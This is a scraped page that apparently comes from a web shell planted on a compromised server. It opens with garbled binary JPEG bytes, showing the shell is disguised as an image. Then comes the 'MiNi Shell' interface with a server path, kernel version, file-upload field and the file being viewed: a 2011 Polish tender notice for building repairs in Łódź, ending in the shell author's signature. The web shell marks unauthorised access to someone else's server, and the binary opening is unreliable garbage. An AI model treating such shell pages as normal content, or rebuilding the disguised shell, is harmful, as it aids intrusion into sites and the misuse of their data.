JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110608/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110608/159439-N-2011.html

<p class="kh_header"><b>Łódź: Przetarg ZP/5/2011

NA 

Usługę w zakresie usuwania awarii, oraz bieżących napraw i konserwacji obejmujących roboty budowlane, stolarskie, szklarskie ślusarskie i dekarskie w budynkach i lokalach komunalnych stanowiących zasób  Administracji Nieruchomościami</b><br>
<b>Numer ogłoszenia: 159439 - 2011; data zamieszczenia: 08.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Bałuty "Bałuty Nowe" , ul. Sędziowska 16, 91-304 Łódź, woj. łódzkie, tel. 042 6546896, faks 042 6546896.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.balutynowe.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg ZP/5/2011

NA 

Usługę w zakresie usuwania awarii, oraz bieżących napraw i konserwacji obejmujących roboty budowlane, stolarskie, szklarskie ślusarskie i dekarskie w budynkach i lokalach komunalnych stanowiących zasób  Administracji Nieruchomościami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie usuwania awarii oraz bieżących napraw konserwacyjnych w zakresie  robót  ogólnobudowlanych - murarskich, tynkarskich, stolarskich, szklarskich, ślusarskich, dekarsko - blacharskich w budynkach i lokalach komunalnych stanowiących zasób Administracji Nieruchomościami Łódź - Bałuty Bałuty-Nowe polegające na:
1.	Zbijaniu odparzonych tynków.
2.	Zamalowywaniu napisów na elewacjach budynków.
3.	Demontażu reklam.
4.	Naprawie - uzupełnieniu nawierzchni betonowych ( pojedyncze ubytki)
5.	Naprawie - uszkodzonych miejsc w ścianach z cegły ( pojedyncze ubytki)
6.	Uzupełnianiu tynków wewnętrznych, zewnętrznych ( pojedyncze ubytki) na pow. do 5 m2
7.	Wykonywaniu odkrywek w zależności od potrzeb.
8.	Naprawie stopni schodowych (pojedyncze biegi i spoczniki)
9.	Naprawie drzwi wejściowych do pomieszczeń wspólnych (dopasowanie skrzydeł, wymiana opasek drzwiowych i listew przymykowych, wykonanie progów, umocowanie wyrwanych ościeżnic, umocowanie lub wymiana zawiasów rygli, naprawa ramiaków.
10.	 Naprawie okien w pomieszczeniach wspólnych ( dopasowanie skrzydeł, wymiana  oliwek,
mocowanie i wymiana zawiasów, dorabianie elementów skrzydeł), pasowaniu skrzydeł do ościeżnic.
11.	 Szkleniu skrzydeł okiennych i drzwiowych w pomieszczeniach wspólnych.
12.	Naprawie lub wymianie zamków i klamek w pomieszczeniach wspólnych.
13.	Zabezpieczeniu otworów okiennych i drzwiowych w lokalach wolnych 
      i w pomieszczeniach wspólnych (płyta pilśniowa, paździerzowa, siatka, zamurowanie
      pojedynczych otworów itp.)
14.	Naprawie schodów drewnianych (wymiana pojedynczych stopni drewnianych, desek spoczników).
15.	Naprawie balustrad (przymocowywanie ruchomych balustrad, dorabianie i montaż poręczy, słupków, tralek itp.)
16.	Naprawie ścianek drewnianych w pomieszczeniach wspólnych.
17.	Drobnej naprawie ślusarskiej - drzwi, bramy, wymianie uszkodzonych zamków, wkładek oraz samozamykaczy.
18.	Naprawie - z wykonaniem włazów dachowych oraz wsypów piwnicznych.
19.	Wymianie kłódek
20.	Zabezpieczaniu budynków po pożarze.
21.	Dostarczaniu piecy i kuchni węglowych do lokali oraz pralni, wc-ogólne wraz z podłączeniem.
22.	Osadzaniu trzepaków w zależności od potrzeb.
23.	Stemplowaniu (pojedyncze stemplowanie zagrożonych konstrukcji).
24.	Innych robotach związanych z awaryjnym usunięciem zagrożenia.
25.	Naprawie podłóg
26.	Usuwanie śniegu z dachów, sopli i nawisów śnieżnych 
27.	Zabezpieczanie lokali po eksmisjach.
28.	Naprawie pokryć dachowych- naprawy punktowe
29.	Naprawie rynien i rur spustowych
30.	Wykonywanie drobnych obróbek blacharskich
31.	Drobnej naprawie Wentylacji grawitacyjnej, głowic kominowych i kominów.
32.	Drobnych pracach zabezpieczających obiekty i urządzenia przed skutkami mrozu. 

Usługi będą realizowane w dni powszednie oraz w dni wolne od pracy (soboty, niedziele i święta) w systemie całodobowym.

Wymagania:

2.1.     Podstawą wykonania prac, o których mowa wyżej są:
2.1.1.      zgłoszenia pisemne służb Zamawiającego sporządzane wg wzoru (załącznik nr 2 do umowy); zgłoszenia telefoniczne służb Zamawiającego (potwierdzane zleceniem pisemnym w terminie późniejszym).
2.1.2.  zgłoszenia telefoniczne bezpośrednio od najemców w przypadkach awarii stanowiących zagrożenie życia lub mienia. W takim przypadku Wykonawca przyjmuje zlecenie i ma obowiązek powiadomić Zamawiającego  o zgłoszeniu, zaś Zamawiający wystawia zlecenia.
   2.2.   Realizacja zgłoszeń:
2.2.1.	Usługi będą zgłaszane pod wskazany przez Wykonawcę numer telefonu i    świadczone codziennie w godzinach pracy i po godzinach pracy Administracji w dni powszednie, oraz w systemie ciągłym całodobowym w dni wolne od pracy (soboty w niedziele i święta).
2.2.2.	Pilność realizacji zgłoszeń strony ustalają: 
         		a)   natychmiastowo - awarie i zgłoszenia stanu zagrożenia dla życia, zdrowia i   
     		mienia mieszkańców. Maksymalny czas reakcji na zgłoszenie - 60 minut.  
b) W ciągu 2 dni - sprawy pilne lecz nie stanowiące zagrożenia życia, zdrowia i    
    	mienia mieszkańców.
           	c) inne - w terminach uzgodnionych z Zamawiającym. 
2.3.  Wykonane przez Wykonawcę prace konserwacyjne wymagają pisemnego potwierdzenia przez lokatora, administratora lub pracownika służby technicznej zamawiającego.
     2.4. Wykonane przez Wykonawcę roboty remontowe wymagają potwierdzenia przez   
            pracownika służby technicznej Zamawiającego.
     2.5. Wykaz nieruchomości komunalnych objętych przedmiotem zamówienia stanowi załącznik  
           Nr 8 
     2.6. Wykaz nieruchomości Wspólnot Mieszkaniowych w których znajdują się lokale komunalne   
           stanowiące zasób Administracji stanowi załącznik 8a

Roboty należy prowadzić zgodnie z zachowaniem następujących warunków:
-	Roboty muszą być prowadzone zgodnie z Warunkami technicznymi wykonania i odbioru robót budowlano - montażowych oraz sztuką budowlaną.
-	Materiały użyte do wykonania robót muszą posiadać aktualne atesty zgodnie z Polskimi Normami oraz dopuszczenie do stosowania w budownictwie.
-	Kierownik robót musi posiadać odpowiednie uprawnienia budowlane.
-	Przy wykonywaniu robót nie mogą  zostać naruszone prawa osób trzecich.
-	Wykonawca odpowiada za szkody powstałe z jego winy.
-	Po zakończeniu prac teren robót powinien być doprowadzony do porządku.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1.   Warunkiem udziału w  niniejszym postępowaniu jest wniesienie wadium w wysokości:    
        8 000 zł
9.2.   Wykonawca wnosi wadium przed upływem terminu składania ofert, o którym mowa 
         w pkt 14.2
         9.3.   Wadium może być wniesione w:
                 9.3.1. pieniądzu;
                 9.3.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
                           kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
                 9.3.3  gwarancjach ubezpieczeniowych;
                 9.3.4. gwarancjach bankowych;
                 9.3.5. poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2
                          Ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju  
                          Przedsiębiorczości (Dz. U. nr 109, poz. 1158, z późn. zm.)                
9.4.   Wadium wnoszone w pieniądzu należy wpłacać przelewem na konto:
                  GETIN BANK S.A.
                  Oddział Regionalny GETIN BIZNES w Łodzi
                  98 1560 0013 2027 2236 9637 0005
                  z zaznaczeniem: wadium - przetarg ZP/5/2011 
	     9.5   Zamawiający zatrzymuje wadium wraz z odsetkami,jeżeli Wykonawca w odpowiedzi na                  
                 wezwanie, o których mowa w art. 26 ust. 3 Pzp, nie złoży dokumentów lub oświadczeń  
                 o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że   
                 wynika to z przyczyn  nie leżących po jego stronie art.46 ust 4a Pzp
	     9.6   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta
                 została wybrana:
                  1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
                       określonych w ofercie. 
                  2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z   
                       przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy, że spełnia warunki wymagane art. 22 ust. 1 ustawy Prawo zamówień publicznych (Załącznik Nr 2).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz usług - polegających na drobnych naprawach i konserwacji w zakresie niezbędnym do wykazania spełnienia tego warunku, wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane lub są wykonywane należycie na min 300 000 zł brutto przynajmniej w ciągu jednego roku. (załącznik nr 4)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia - min 6 osób - pracownicy o następujących kwalifikacjach : murarz - tynkarz,  dekarz - blacharz, stolarz, malarz, ślusarz-spawacz,   w tym osoba posiadająca uprawnienia kierownika budowy o specjalności konstrukcyjno-budowlanej wraz z ważnym zaświadczeniem z Okręgowej Izby Inżynierów Budownictwa (załącznik nr 5) - OŚWIADCZENIE że osoba pełniąca bezpośrednio obowiązki kierownika robót posiada wymagane uprawnienia.(załącznik nr 6)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>kserokopia opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony Formularz oferty(Załącznik Nr 3).Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o 
udzielenie zamówienia (np. w formie spółki cywilnej).Zaakceptowany wzór  umowy (Załącznik Nr 7).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>18.1	Istotne postanowienia , które zostaną wprowadzone do umowy oraz wszystkie przyszłe zobowiązania Wykonawcy zostały przedstawione we wzorze umowy (załącznik nr 7)
18.2	Wykonawcy występujący wspólnie (np. w formie spółki cywilnej) ponoszą solidarną odpowiedzialność za wykonanie umowy.
18.3	Zamawiający przewiduje możliwość dokonania zmian postanowień umowy , gdy zmiana wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy np. zmiana formy własności nieruchomości, zmiana zarządcy, osoby bezpośrednio nadzorującej wykonanie robót. 
18.4	Zmiany ustawowej stawki podatku VAT
18.5	Zmian podmiotowych po stronie wykonawcy zgodnie z obowiązującymi przepisami prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.balutynowe.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Administracji Nieruchomościami Łódź - Bałuty Bałuty Nowe,  ul. Sędziowska 16, 91-304 Łódź w pok. 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2011 godzina 09:00, miejsce: w Administracji Nieruchomościami Łódź - Bałuty Bałuty Nowe,  ul. Sędziowska 16, 91-304 Łódź w pok. 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com